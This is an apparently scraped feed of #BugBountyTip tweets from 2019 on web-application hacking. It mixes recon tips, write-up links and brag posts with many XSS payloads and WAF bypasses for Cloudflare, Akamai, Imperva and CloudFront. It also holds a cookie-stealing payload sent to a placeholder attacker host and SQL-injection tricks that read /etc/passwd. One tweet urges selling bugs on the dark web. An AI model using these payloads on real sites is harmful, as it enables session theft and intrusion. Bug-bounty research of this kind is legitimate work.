0 pyRobots: a tool that reads "robots.txt" file and appends each path to the domain/subdomain you entered. https://t.co/S8hs6cdXxF #bugbountytips #python #BugBounty #BugBountyTip https://t.co/yeLvkcCUeo
Pavandeep
@Pavandep8


2019-08-01 17:29:00
1 Look what I shared: Bypassing CORS - #Hacker #hackers #BugBountyTip #BugBounty @MIUI| https://t.co/Q8f8YDZhf5
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-01 16:00:56
8 I will show you the real impact of the #XSS #BugBountyTip #security when you find the reflection use payload: on[whatevereventworks]= "location=`http://attackersitecom/?`+cookie"> attackersite will get user cookies. this is how XSS works!
emir c a
@emirca_


2019-08-01 12:36:03
0 Searching for XSS vulnerabilities all day and night. Still couldn't find anything. Maybe looking the wrong place with wrong keys. #BugBounty #BugBountyTip
Bogdan Bodishtyanu
@xalerafera


2019-08-01 12:34:52
0 If you come across requests with the OPTIONS method, do not miss them. Try changing them to the GET method and try to find XSS and SQL injection vulnerabilities! Good luck for hunting. #BugBountyTip #Hacker0x01 #TogetherWeHitHarder https://t.co/8ZsBWwzJ3O
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 12:21:36
3 Another way to use throw without a semi-colon: 👾 <script /***/>~/***/confirm(´\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450´~)/***/</script /***/ #WAF #BugBounty #BugBountyTip #infosec
Imran Parray
@CreedHackers


2019-08-01 12:03:17
4 Steal it like you own it. #TIP: 1- Collect endpoints/parameters from the API request. 2- Make a Brute-force List . 3-Now use that list to recursively bruteforce all the API endpoint. #BugBountyTip #infosec #Cybersecurity @Bugcrowd https://t.co/HGqFYKSOQs
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 10:41:54
1 Unusual data load encrypted with Base64 can be useful when passing through a web firewall filter. 👾 <svg/onload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//> #WAF #BugBounty #BugBountyTip #infosec
expl0itc0der
@vanshitmalhotra


2019-08-01 10:14:22
0 #BugBountyTip — Follow reddit/r/bugbounty ! Interesting #BugBounty writeups shared almost every day !
𝓚𝓮𝓷𝓪𝓷
@h1_kenan


2019-08-01 09:39:41
0 100 people did it wrong 😂 always try to play with token, sometimes server side, it isn't checked properly #BugBountyTip https://t.co/ouioxKziDq
Jason Sewell
@sewell_jason


2019-08-01 08:31:31
0 TFW you know you're in a #docker container. #pentesting #BugBountyTip https://t.co/SfA0p6ERZx
Ammar Amer
@cry__pto


2019-08-01 08:01:39
2 the best BugBounty books to read. consider them one book. real world bughunting:will learn you how to find bugs based on real world reports Bug Bounty Hunting Essentials;will learn you how to find bugs based on practical effective pentesting methods. #BugBountyTip #BugBounty https://t.co/3vZcTV80E8
SaadAhmed
@XSaadAhmedX


2019-08-01 07:02:26
7 Here Is the Write-up how I bypass the CORS to steal the victim account information ๐Ÿง๐Ÿง https://t.co/Z95XcdIAKx #bugbountytip #bugbountytips #bugbounty @Bugcrowd
ᴂ
@pouyana1


2019-08-01 03:21:17
0 found a bug in microsoft outlook web app : everyone sends me an email, the mail won't deliver and he/she will automatically sign out after that 😂😂 will make a video for it soon #bugbounty #BugBountyTip #infosec #Microsoft #hack #hacking
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-08-01 00:13:26
1 XSS load has been found interesting but effective: " onclick=alert()//<button ' onclick=alert()//> */ alert()//<img style="background-url=eval(onclick)" onclick=alert()>//> #WAF #BugBounty #BugBountyTip #infosec https://t.co/gxXVGVvV3w
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 23:56:33
0 Interesting XSS For example, enter where Id = 123 is reflected in the JSON body inside the code label. ? If you send id = </ script>, the application will delete the entry. This,? Id ["</ script>"] = 123 can be skipped. #WAF #BugBounty #BugBountyTip #infosec #developer https://t.co/f3RMj0nTce
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 22:50:37
0 Xss using css: <style>img{background-image:url('javascript:alert(1)')}</style> Firewall bypass: <style>*{background-image:url('\6A\61\76\61\73\63\72\69\70\74\3A\61\6C\65\72\74\28\6C\6F\63\61\74\69\6F\6E\29')}</style> #WAF #BugBounty #BugBountyTip #infosec
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 21:06:47
1 @brutelogic { XSS } test results in successful payload bro. https://t.co/pFNM1awbI5</script><svg><script>alert(1337)%0A--> #payload #BugBounty #BugBountyTip #WAF
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 20:58:06
0 Another bypass DotDefender WAF ๐Ÿ‘พ <bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme #WAF #BugBounty #BugBountyTip #infosec
Andri Wahyudi 🕊️
@andripwn


2019-07-31 20:35:20
1 Skip XSS filters with CloudFlare{}; 😊 <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 18:43:01
1 R.I.P. Fixed a chip with bypass cloud glare. 💉 but also jumps {cloudflare}: '"><iframe srcdoc='%26lt;script>;prompt${document.domain}%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec #bypass #vulnerability #security #exploit
Mohammed Rishin
@mohd_rishin


2019-07-31 17:27:30
1 This bug allowed everyone to apply for #Google CEO's position . #Googlejob #HiringNow #hiring #LinkedIn #bug #bugbountytip #dataprivacy #jobseekers #job #fraud #marketing #business #entrepreneur #organization Read More: http: https://t.co/rlE7n7PnRi
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 16:25:38
0 Another { WAF CloudFlare bypass } that works on angle brackets and looks like it: It can work without an iframe. It's not fixed yet. 🕸️ xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'> #WAF #BugBounty #BugBountyTip #infosec
Dhamu
@Dhamuharker


2019-07-31 15:53:21
0 #bugbountytips #BugBounty #bugbountytip #ItTakesACrowd #TogetherWeHitHarder If you are able to exploit Apache | Server Status try these things, you may end up getting the Server Status Access GET /server-status/common.htm https://t.co/GqiZVfFDgR
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 14:14:45
2 { ontouch * } handlers for mobile XSS ๐Ÿง <body ontouchstart=alert(1)> <body ontouchend=alert(1)> <body ontouchmove=alert(1)> #WAF #BugBounty #BugBountyTip #infosec
BarMosseri
@MosseriBar


2019-07-31 14:02:16
0 Looking for someone to do with him bounty #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 13:55:36
0 To include an image via url: Enter #payload: { https://x onerror=alert(1) }; #WAF #BugBounty #BugBountyTip #infosec https://t.co/8pKwE3FaIq
intigriti
@intigriti


2019-07-31 11:55:17
0 Tip of the day: check for exposed Slack tokens using @streaak's #BugBountyTip and find out if hackers could have been snooping on your Slack conversations. ๐Ÿ‘€ https://t.co/jh41qZJkgb
Petko D. Petkov
@pdp


2019-07-31 11:52:12
0 One of my critical issues (disclosure of credentials and API tokens) was just downgraded to Low because it affects non-prod environments. Obviously I disagree but such is life. $250 #bugbountytip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 11:42:34
0 CloudFront XSS bypass: <--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!> #WAF #BugBounty #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-07-31 11:14:39
3 Faxploit: Breaking the Unthinkable https://t.co/I0erESpyd7 Follow Us for Cyber Security Trainings https://t.co/iNczOcGmCt #bugbounty #bugbountytip #penetrationtesting #pentesting #devops #devsecops #hacking
expl0itc0der
@vanshitmalhotra


2019-07-31 11:07:14
1 The Art of Man-in-the-Middle Attack https://t.co/XNvtS3duJ1 #bugBounty #bugbountytip #penetrationtesting #devops #devsecops #hacking #training #securitytraining #ceh
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 10:34:39
0 {xSS}; payload to ByPass CloudFlare protection. <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> #WAF #BugBounty #BugBountyTip
max_shah_aqi
@aqibshah


2019-07-31 07:53:21
1 #Bugbountytip: To include an image via url: Enter #payload: https://x onerror=alert(1) #xss #BugBounty https://t.co/GGTm3PH1m1
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-31 07:50:24
2 Cloudflare #XSS #Bypass via dot 😎 "<BODY onload!#$%&()*~+-_.###:;[email protected][/|\]^`=alert(“XSS”)>" #WAF #BugBounty #BugBountyTip
Ammar Amer
@cry__pto


2019-07-30 23:45:02
2 html injection and content spoofing in the wild: -WITHIN SECURITY CONTENT SPOOFING: https://t.co/s7Xbpfrmgd -HACKERONE UNINTENDED HTML INCLUDE FIX BYPASS: https://t.co/lBF8pNKZP9 -THROUGH CHARACTER ENCODING: https://t.co/6W1u73x52P #bugbountytip #Hacking #Pentesting
m0z
@LooseSecurity


2019-07-30 23:34:54
1 #BugBounty #bugbountytip #bugbountytips #infosec Yes, CRLF injection "exists", but don't waste time on it. I see a lot of people trying to get header injection via CRLFs and it's really not going to happen... It's so rare these days. Your time is better spent on something else.
Navneet
@na5n33t


2019-07-30 19:26:07
1 Team adds the token parameter to avoid CSRF but forget to check even presence of token parameter is mandatory or not. 😅 I removed the token parameter and CSRF works as charm. 🙊Then look for other request and it also acts same 🙊 #bugbounty #bugbountytip #infosec
(((Gamliel)))
@Gamliel_InfoSec


2019-07-30 19:17:10
0 "Always go for the highest impact!" -Hussein Daher #bugbounty #bugbountytips #bugbountytip https://t.co/2O5NWuPVLu
Ashish Kunwar
@D0rkerDevil


2019-07-30 18:10:51
0 #bugbountytip: look into feedback forms and contact-us forms for smtp injection
SECARMY
@secarmyofficial


2019-07-30 17:17:26
0 Check out our Introduction to Our Bug Bounty Course Watch on Youtube Now https://t.co/EQPAUJUJ8c #wearesecarmy #bugbounty #bugbountytip #hacking #training #infosec https://t.co/NJgwu5upbH
Ammar Amer
@cry__pto


2019-07-30 14:58:00
1 new articles as a pdf files has been uploaded to my github. repository,the number of articles will continue to get higher until it reach 2000 articles as a pdf files the path to new articles https://t.co/gtsrUpWfF6 #bugbountytip #BugBounty #OSINT #Hacking #PenTest #CyberSecurity https://t.co/U4YyF3zRqa
miraitowa
@miraitowa1


2019-07-30 12:45:07
0 Thank you very much for sharing. I look forward to your next [email protected] #BugBounty #bugbountytip Live Bug Bounty Recon Session on Yahoo (Part 1 - 7/14/2019) https://t.co/0DbMDbOSHR via
miraitowa
@miraitowa1


2019-07-30 11:18:18
8 SSRF Trick: SSRF/XSPA in Microsoft's Bing Webmaster Central by Elber Andre #bugbounty #bugbountytip #SSRF https://t.co/WDDlxRSUh2
Deepak Holani
@w_hat_boy


2019-07-30 07:58:38
0 #bugbountytip : Sometime when u come across for specific features but for that u have to pay just go on Google images type company name .. some people put images that contain end point url which is not under demo feature ..but contain in full specific features
mAshraf
@mAshraf9_


2019-07-30 07:54:07
0 As long as it is a program, a bug may appear. #infosec #BugBounty #bugbountytip #bugbountytips
RHack
@Queseguridad


2019-07-29 23:11:58
0 Akamai Bypass "><marquee%20loop=1%20width=0%20ontoggle=confirm=prompt`${1}`> Imperva Bypass "><details%20open%20ontoggle=confirm(1)> #bugbountytip #bugbountytips #akamaibypass #impervabypass
Jagannath
@SecurityBoy0x01


2019-07-29 15:22:32
0 Spawning a shell : https://t.co/yDo6mISHKt #infosec #bugbountytip #cybersecurity
Jagannath
@SecurityBoy0x01


2019-07-29 15:06:26
1 As I learn about PCI-DSS, I am collating the notes as I go. Here are they if you are interested. https://t.co/QayaJkJVDZ #PCI_DSS #infosec #dataprivacy #bugbountytip
Wh11teW0lf
@Wh11teW0lf


2019-07-29 13:33:36
0 #BugBounty #bugbountytip #bugbountytips # Don't forget for console.log() if alert()/confirm()/prompt() are blocking!
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-29 10:58:18
0 Skip XSS filters with CloudFlare{}; 😊 <select><noembed></select><script x='[email protected]'a>y='[email protected]'//[email protected]%0a\u0061lert(1)</script x> #WAF #BugBounty #BugBountyTip
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-29 07:50:42
0 (&& = %26%26) sql injection "and" filter bypass %26%26 1=1 #WAF #BugBounty #BugBountyTip #injection #Bypass
/𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-07-28 23:39:07
1 Chrome XSS byPass: %00%00%00%00%00%00%00<script%20src=(link: https://t.co/Tek0Fh9NMv) https://t.co/Tek0Fh9NMv ></script> #WAF #BugBounty #BugBountyTip
Sul will be at BlackHat
@pwnb0xes


2019-07-28 23:22:54
0 If a company isn't paying enough for your bug bounty take it to the dark web to get paid! #HIPHOPMUSIC #infosec #bugbountytip #getpaid
Aziz Hakim🇧🇩
@hackerb0y_


2019-07-28 21:18:20
0 While hunting a program I got an admin panel sub, eg: https://t.co/2iAH1i18kT Tried many way to bypass but couldn't succeed! Then entered main program's login info and clicked into login! Guess what? It took me to Admin Panel 🤙 #infosec #bugbountytip #BbWorld19 #bugbounty
MrB0LTv2 (தமிழன்)
@MrB0LTv2


2019-07-28 15:15:39
0 A little reward to a lazy guy for his lazy progress.!!😅 Hopefully, Rewards crossed 1st 1000€!!😋 Thnks @YogoshaOfficial #bugbountytip = Some things will take time!! And Patience matters..!! #bugbounty #We ❤️ #தமிழன் https://t.co/Bk2UeLp5eX
baluz
@haknfuk


2019-07-28 14:51:23
0 @MrB0LTv2 i like that #bugbountytip
MrB0LTv2 (தமிழன்)
@MrB0LTv2


2019-07-28 14:44:23
0 A little reward to a lazy guy for his lazy progress.!!😅 Hopefully, Rewards crossed First 1000€ Euros!!😋 Thanks to all my well-wishers and yogosha.official #bugbountytip = Some things will take time!! And… https://t.co/iKQCiQ4wxy
Demolalagos
@Demolalagos1


2019-07-28 14:44:05
0 #bugbountytip If wappalyzer is showing the latest angular version of the site don't think of not getting xss bypass, I used angular xss payload v 1.3.2 on a website using angular js v1.6.4. Developers do make mistakes... Hope you like the tip. Happy hacking
Ammar Amer
@cry__pto


2019-07-28 11:44:40
2 when you see a Registration page, during a web pentesting operation you should try discover if you can enumerate usernames by trying to register with an existing username. #bugbountytip #BugBounty
Navneet
@na5n33t


2019-07-28 07:59:50
0 The website is protecting the CSRF by checking the Referer header and then this bypass helps. Successfully bypassed and submitted. Let's hope for the bounty. 😄😅 #bugbounty #bugbountytip #infosec “[Critical] Bypass CSRF protection on IBM” by Mohamed Sayed https://t.co/ZOB0m0odX5
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-28 04:46:13
0 #bugbountytip trust me if it's that easy, everybody would be doing it .
Minture
@minturebr


2019-07-28 01:12:59
0 Use tweetdeck to keep an eye on new writeup, tweets, posts. #bugbountytip #bugbountytips #hacking
m0z
@LooseSecurity


2019-07-28 01:02:19
4 #bugbountytip #bugbountytips #infosec #infosecurity Instead of always using <img src=x onerror=alert(0)> why not try: <audio src=x onerror=alert(0)> <video src=x onerror=alert(0)> Or my favorite: <script src=x onerror=alert(0)>
Malav Sharma (Wolfdroid)
@ShMalav


2019-07-27 15:42:19
0 #bugbountytip If wappalyzer is showing the latest angular version of the site don't think of not getting xss bypass, I used angular xss payload v 1.3.2 on a website using angular js v1.6.4. Developers do make mistakes... Hope you like the tip. Happy hacking
Romansh yadav
@Romanshyadav


2019-07-27 14:10:28
8 Think better!. Book your pass for @bsidesahmedabad on early bird discount now. Pass link: https://t.co/psZDqWoxSt cc: @SecurityBSides @niksthehacker @dipenwadhwa @H4ck3rVishal @InfosecVandana @emgeekboy #conference #workshop #Hackers #bugbountytip #researcher https://t.co/adotzHI76s
Max
@0xw2w


2019-07-27 12:59:31
0 Tip: If you have an API endpoint like /api/v2/****/, try to substitute v* with a less number and look at the reaction. Maybe there is an IDOR or improper auth bug #bugbountytip
JR0ch17
@JR0ch17


2019-07-27 06:26:58
1 #bugbountytip for me tonight is always check if I have an upstream proxy server configured in Burp😅
vavkamil
@vavkamil


2019-07-26 18:10:51
0 XSSwagger v0.1 for detecting old Swagger UI versions vulnerable to XSS attacks #bugbounty #bugbountytip https://t.co/1sKKF9Jusn
Petko D. Petkov
@pdp


2019-07-26 17:42:11
2 Everyone is looking for XSS, SQLI, RCE and SSRF. You might get lucky but you are competing with the world. To be successful at bug bounty hunting one should look for those things no one else is looking for, which may seem harder but actually not hard at all. #bugbountytip
mAshraf
@mAshraf9_


2019-07-26 15:00:47
1 When they say the greatest vulnerability in a SDLC is human beings, they mean there will always be a bug there.😋😋 #infosec #BugBounty #bughunter #bugbountytip
bl4ckh4ck5
@bl4ckh4ck5


2019-07-26 12:46:05
0 @intigriti i shortly ago reported a clickjacking as high because it led to sensitive data exposure. just make the transparency of the iframe very low and let him steal his own information using ctrl+a and ctrl+c and place that in a separate input field. make it as a game ;) #bugbountytip
SecuNinja
@secuninja


2019-07-26 11:38:25
0 when <svg/onload=alert(1)> is not working, try without forward slash and add a whitespace <svg onload=alert(1)> #bugbountytip
Dhamu
@Dhamuharker


2019-07-26 11:02:24
0 Oracle WebLogic Server Remote Command Execution #bugbountytips #exploits #webappsec #BugBounty #bugbountytip #ItTakesACrowd #togetherwehitharder https://t.co/Vx9MVr0olN
Yatin Sharma
@Iam_yatin


2019-07-26 07:26:03
0 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/UWTb7gRxXJ #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/AID3v5Thnx
Romansh yadav
@Romanshyadav


2019-07-26 06:55:03
1 Seats are filling so fast. Don't wait ! Grab your @bsidesahmedabad seat now on early bird discount. https://t.co/psZDqWoxSt #Conference #workshops #Hacker #bugbountytip #researchers CC: @SecurityBSides @niksthehacker @H4ck3rVishal @dipenwadhwa https://t.co/YUj5U0dvxd
m0z
@LooseSecurity


2019-07-25 15:53:43
0 #BugBounty #bugbountytip #bugbountytips #infosec I think it's worth replacing alert(0) in all your payloads with prompt `0` as it's an easy way to increase the probability of getting a successful #XSS vulnerability!
{{ '127.0.0.1’}}
@shivam31200


2019-07-25 15:36:32
0 So here <script> alert(1)</script> was popping 1 after trying to steal cookie via this <script> alert(document.cookie)</script> Not working :/ Final payload: <script> alert(1)</script> <script> alert(document.cookie)</script> It will popup user cookie #bugbountytip noobtip
Michele Romano
@Mik317_


2019-07-25 14:04:13
0 TIP: If you don't like small scopes, explore also `out-of-scope` subdomains ... you could find juicy endpoints containing CRLF/XSSI issues, that can be used to achieve a concrete impact also on the main domain :) #bugbountytip #BugBounty #bugbountytips (last one: now)
vavkamil
@vavkamil


2019-07-25 11:09:04
1 XSS ontouch* for mobile #bugbountytip https://t.co/WWyNp0FtYu
Petko D. Petkov
@pdp


2019-07-25 07:17:36
0 Reported vulnerability which allows me to takeover corporate accounts, access email and so on - flagged as informative. You are amateurs. #bugbountytip
h3rm17w0lf
@h3rm17w0lf


2019-07-25 05:15:17
0 Ever came across a bug that made you sleepless until you exploited it ? I am working on one such and haven’t had a good sleep since two nights. #BugBounty #bugbountytip
Sarvagya Sagar
@0ffensivemitthu


2019-07-25 00:48:57
0 [ #bugbounty #bugbountytip ] - Oauth Hacks 💰 RFC6819 : https://t.co/8NNpx9sqgN Video : https://t.co/t7oarM6fc6 Writeup : https://t.co/que1GGgBK7 or https://t.co/cIRzuyGO7k or https://t.co/tvwk5MPhSq Cheatsheet : https://t.co/KZxpCODZ3L
plenum 🇹🇳
@plenumlab


2019-07-25 00:14:25
1 #bugbountytip when looking for priv esc read the api docs jump to old versions look for interesting calls and watch out for deprecated api endpoints sometimes they continue to use them for backward compatibility. Some functions like invite, join, create, delete... #BugBounty
Ammar Amer
@cry__pto


2019-07-24 22:30:49
1 you can use the fragments plugin in the WebScarab proxy to identify the comments in the html source code which may contain useful/sensitive info for the pentester, an easy & fast way to search through the entire source code and find comments. #bugbountytip
pi0wlz
@pi0wlz


2019-07-24 17:29:37
0 if u use gobuster tool for dns enumeration like $ gobuster dns -d https://t.co/ixNnyR6gG7 -t 100 -w common-names.txt -o gobuster-findings, u can parse the output with $ cat gobuster-findings | sed 's/Found: //' > filter.txt #bugbountytip
BarMosseri
@MosseriBar


2019-07-24 14:36:58
0 When you got xss on Hyatt service :) #bugbountytip https://t.co/1oFu9K2Yyr
m0z
@LooseSecurity


2019-07-24 13:47:10
4 One of my favorite #XSS payloads of ALL TIME!!! <input/onfocus=alert(0) autofocus> Perfect for injecting inside of input tags, abusing the 'autofocus' attribute by combining it to an 'onfocus' event handler. #BugBounty #bugbountytip #bugbountytips #infosec #infosecurity
Pedro Henrique Cardoso
@G4L1C


2019-07-24 12:54:07
1 If a sqli target has magic quotes enabled you can avoid this by converting the string to Hex or Char. Example: load_file('/etc/passwd') = load_file(0x2f6574632f706173737764) Or load_file(chars(n1,n2,n2 [...])) #bugbounty #bugbountytip #bugbountytips #sqli
Alin Ciocoiu
@17Akun


2019-07-24 06:24:54
0 Hi. What note taking tools do you use for your projects? Cloud/non- cloud, but free. #pentest #pentesting #bugbountytip #bugbountytips
mayur gupta
@rootmayur


2019-07-24 04:51:13
0 I got 300$ for my submission💰💰 https://t.co/5BcAOrTsHP #bugbountytip #bugcrod #ethicalhacking
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 02:12:32
1 [ What I Learned Today : 03 ] #BugBounty #bugbountytip Indepth Bug Bounty Guide : https://t.co/e89Kne5bWf 💰 Well written blog post by @officialpranj . For Newbies in Infosec - I recommend to read this blog post , twice in a week . ~ Thread : #0xWilt : @0xWilt
Sarvagya Sagar
@0ffensivemitthu


2019-07-24 01:47:14
1 [ #Motivation #bugbounty #bugbountytip #infosec ] No one can spoonfeed you everything You have to do itself You have to be Self learner or Independent learner If you’ve lack of motivation to learn then your infosec career is end here Bcz You’re not going to get far in Infosec
Petko D. Petkov
@pdp


2019-07-23 22:12:59
0 Sometimes it will take 9 months to get your bugs triaged #bugbountytip
Learning Appsec
@learningappsec


2019-07-23 19:00:14
1 Enumerated all the live urls ? next what ? Open all of them at once in your browser using https://t.co/HDt8VcPYSm #bugbountytip #bugbounty #AppSec
Petko D. Petkov
@pdp


2019-07-23 17:52:06
0 Competition is for the suckers #bugbountytip
Proxy
@LinuxKodachi


2019-07-23 17:06:59
0 Want to test your programming and problem solving skills? Here we go : {🕷} https://t.co/QXNsAcMuSL #Developer #programmers #bugbountytip
Pascal S
@PascalSec


2019-07-23 15:04:32
0 #BugBountyTip: If you use an automated Github secret scanner, make also sure to automate the GIT clone URL retrieval. Just created a GIST for that -> https://t.co/TPI4reVPZ1 Let me know if this is helpful and RT 😎
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 14:05:18
2 Hey Guys, Join me and many other infosec aspirants in this group named Nullcrowd - https://t.co/ahMK4OPqkP , The best infosec community. #BugBounty #bugbountytips #bugbountytip #infosec #infosec19 #hacking #programming #programminglife #cybersecurity
d4d
@d4d89704243


2019-07-23 11:47:46
0 Check my new exploit for #image #processing library. This time it is GraphicsMagick https://t.co/OmYiOr2d27 #exploit #bugbountytip #bugbounty
Petko D. Petkov
@pdp


2019-07-23 11:28:24
0 Out of scope bugs are worth reporting - if nothing else you are making a good impression #bugbountytip
midhun
@Midhunryann


2019-07-23 11:24:58
1 @Hacker0x01 bug type :ssrf.. Program :private reward : 300usd First reward #infosec #newbie #bugbounty #bugbountytip https://t.co/KwcO4IP9m6
Sarvagya Sagar
@0ffensivemitthu


2019-07-23 02:02:12
2 [ What I Learned Today : 02 ] #BugBounty #bugbountytip #infosec #bugbountytips How does the internet works : Amazing whitepaper : ~ https://t.co/X3hEqNOUKD 💰 I recommend everyone to read this because this is building block for Infosec 🌈 ~ Thread : #0xWilt
Ameen
@ameenmaali


2019-07-22 22:42:30
0 #bugbountytip: (IDORs) if an endpoints accepts a list of IDs and you get unauthorized for [‘invalidId’] - try [‘validId’, ‘invalidId’]. It’s very possible the validation only occurs on the first element or if any element is valid. Seen it many times
Rubyfu
@Rubyfu


2019-07-22 21:36:20
1 Do you want to bypass Regex based filters? Use regexp-examples gem. It generates a list of all* strings that will match the given regular expression. https://t.co/H42YQhF9na #Rubyfu #OWASP #Pentest #XSS #bugbountytip
bugbountylab
@artofbugbounty


2019-07-22 14:56:43
0 Good references for bounty hunters #OffSec Advanced Web Attacks and Exploitation Resources https://t.co/8zMAn4vtPG #OSWE #bugbountytips #bugbountytip https://t.co/1dMqzPXZij
expl0itc0der
@vanshitmalhotra


2019-07-22 13:07:13
1 A3 - Sensitive Data Exposure OWASP Juice Shop Tutorial - Exploiting Forgot Password #bugbountytip #BugBounty Video Link : https://t.co/wr92be0wXa
Brute Logic
@brutelogic


2019-07-22 12:52:30
4 Use a Microsoft browser like IE11 or Edge. They behave like Burp and curl. #XSS #bugbountytip 😉 https://t.co/xSWgm3EchU
Mohammed Shine
@MohammedShine8


2019-07-22 12:42:29
0 #sqli with no quotes Username: \ Password:||1# #bugbounty #bugbountytip
Khan Sahab 🇮🇳
@UbaidAhmed


2019-07-22 07:46:24
0 Why do many programs do not consider taking screenshot of Credit Card Information screen as a vulnerability? #bugbounty #bugbountytip #infosec
Ameen
@ameenmaali


2019-07-22 07:31:18
5 Been triaging #bugbounty for a couple years and not once seen a XSS report showing impact - I try to do it for each I find. It’s such an easy way to raise the severity with little effort. Look for ATO (email, password change), access to sensitive data/functionality #bugbountytip
ghostlulz
@ghostlulz1337


2019-07-22 00:14:25
0 Exploit development is the new black. Want to get an easy to understand rundown of buffer overflow attacks check out this : https://t.co/FejHKKoPk4 #bugbountytip #infosec #redteam #exploit #osint #pentest #exploiting #security #Assembly #bufferoverflow #apt #hacking #pentest
Yadhavi
@PrincessYadhavi


2019-07-21 22:51:16
0 After upgrading recon-ng to version 5 in kali , recon-ng does not showing any modules. It tells "[*] No modules enabled/installed." How to solve this? #bugbounty #recon-ng #reconng #bugbountytip cc: @LaNMaSteR53
bugbountylab
@artofbugbounty


2019-07-21 17:49:18
1 Get Your Latest Currency Exchange Rates | Refreshing In Every 30 Seconds Mission: Craft a payload link that causes the page stop loading completely through regular expression Denial of Service (ReDoS). https://t.co/8t3nJnhrwr #bugbounty #bugbountytip #bugbountytips #appsec https://t.co/4o3tWcGs4h
pi0wlz
@pi0wlz


2019-07-21 17:37:18
0 #bugbountytip When you run Amass and got a big list with Search engines parse with $ cat amass-findings | sed -e 's/\[[^][]*\]//g' | sed 's/^[ \t]*//;s/[ \t]*$//'
Nikos Gkogkos
@ngkogkos


2019-07-21 11:12:08
1 Love @owaspamass, wordlist masks open so many possibilities! Observing already known subdomains and other naming conventions of the organisation in combination with this could help spot crazy subdomains. #bugbounty #bugbountytip #recon https://t.co/n0iap7t4nZ
Rapid Safeguard
@RapidSafeguard


2019-07-21 04:40:21
0 Self contained htaccess shells and attacks https://t.co/U3THkDJ3Ql #infosec #bugbountytip #bugbounty
bugbountylab
@artofbugbounty


2019-07-21 01:46:24
0 Discover Secret Key from a subdomain disclosed via a Github code repository https://t.co/3MVFLLLHze #bugbounty #bugbountytip #bugbountytips #infosec https://t.co/uztLdgrW5E
محمدن
@mwamiaim


2019-07-20 14:03:15
1 Anyone has a good resource for SSRF Payloads ? #bugbountytip #bugbountytips #Bugbounty
bugbountylab
@artofbugbounty


2019-07-20 12:55:50
0 @NathOnSecurity Cool. It's surprising to get rewarded with weak ssl/tls issues. Thanks for the share. #bugbountytips #bugbountytip
Murdockz
@Murdockz_CEH


2019-07-20 12:15:42
1 AWS S3 buckets do not allow for capital letters in the s3 bucket name. Using a tool like @TomNomNom gf will allow you to find all s3 buckets and sometimes they include capital letters. This will allow for s3 bucket takeovers. My recent s3 takeover. #bugbountytip #bugbountytips
bl4de
@_bl4de


2019-07-20 12:14:16
5 Default #passwords list #hacking #itsecurity #bugbountytip #pentesting https://t.co/tldQUMtFDg
bl4de
@_bl4de


2019-07-20 12:11:20
4 #GTFOBins is a curated list of #Unix binaries that can be exploited by an attacker to bypass local security restrictions. #Linux #hacking #itsecurity #DevOps #PenTesting #bugbountytip https://t.co/50z447IFRc
0xd0m7
@0xd0m7


2019-07-20 09:00:10
1 #bugbountytip Sometimes you will receive a 400 bad request if you are fuzzing with double slash: Solved with a match replace rule!! // > / https://t.co/xTMnrhHOOQ
Mehmet Aura
@rootauraw


2019-07-20 06:20:01
1 Yay! I got 125$ from a PRIVATE program on BUGCROWD for UNCLAIMED SOCIAL MEDIA ACCOUNT using my SCRIPT. ❤️ (https://t.co/BcU0KfqJgh ) Thanks to @bugraeskici #bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd
bugbountymemes
@bugbounty_memes


2019-07-20 05:49:17
0 Domain has url :- "Example(.)com/abcd/xyz" ! "Inurl:abcd inurl:xyz" helped me to get internal IP (X.X.X.X/abcd/xyz) I got 50$ for this #bugbountytip #hackerone #bugbounty #bugcrowd
Frederick Alcantara
@sirfreddyal


2019-07-20 01:47:15
1 Quick guide on Web App Security for any developers out there https://t.co/qNO9UUaj4f #javascript #dApp #webdev #php #python #bugbounties #bugbountytip #pentest
ghostlulz
@ghostlulz1337


2019-07-19 17:33:27
1 If you like easy wins go to github and find exposed credentials. I've personally used this tool on a few engagements it’s great ! #infosec #bugbountytip #redteam #osint #bugbountytips #bugbounty https://t.co/Xf3T7CmWPF
HAHWUL
@hahwul


2019-07-19 16:51:15
